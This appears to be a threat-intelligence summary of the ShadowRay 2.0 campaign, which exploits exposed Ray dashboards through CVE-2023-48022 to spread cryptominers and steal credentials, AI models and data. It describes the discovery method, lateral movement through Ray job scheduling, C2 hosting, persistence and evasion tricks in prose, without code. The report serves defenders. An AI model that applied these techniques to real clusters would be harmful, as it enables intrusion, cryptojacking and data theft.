ShadowRay 2.0 targets Ray clusters whose dashboard / Jobs API is exposed without authentication. Attackers first use interact.sh (oast.fun) for out-of-band discovery, posting test jobs to /api/jobs/ that trigger HTTP/DNS callbacks to identify exploitable Ray dashboards. Once a host responds, they submit multi-stage Bash and Python payloads via Ray jobs to gain remote code execution (abusing the behavior tracked as CVE-2023-48022). The payloads perform environment reconnaissance (CPU/GPU count, cloud context, credentials), search for cloud and database secrets, and then leverage Ray’s NodeAffinitySchedulingStrategy to push malware jobs to every alive node in the cluster—achieving lateral movement entirely through legitimate orchestration features instead of additional exploits.
The campaign has proceeded in two waves. In the first, IronErn440 used GitLab as a DevOps-style C2 and distribution platform, with compromised nodes pulling updated scripts (e.g. run.sh, run-CN.sh, mon.sh, aa.sh) every 15 minutes via cron and systemd services masquerading as health or DNS components. After GitLab banned their accounts in early November 2025, the group rapidly re-created the infrastructure on GitHub, hosting miners and loaders in release artifacts and new repositories, and switching to more advanced ELF droppers and GPU-optimized miners. Across both phases, they deploy XMRig and Rigel miners with process masquerading (e.g. kworker/0:0, dns-filter, .python3.6), cap CPU/GPU usage at ~60% to avoid obvious performance degradation, hide GPU usage from Ray’s metrics, kill competing miners, and block rival pools via /etc/hosts and iptables. Beyond cryptojacking, they add SSH keys for persistent access, exfiltrate MySQL credentials, cloud tokens, source code, proprietary AI models and datasets, use the sockstress tool for DDoS, and leverage compromised clusters to spray ShadowRay probes at new Ray instances—effectively turning the botnet into a worm targeting AI infrastructure.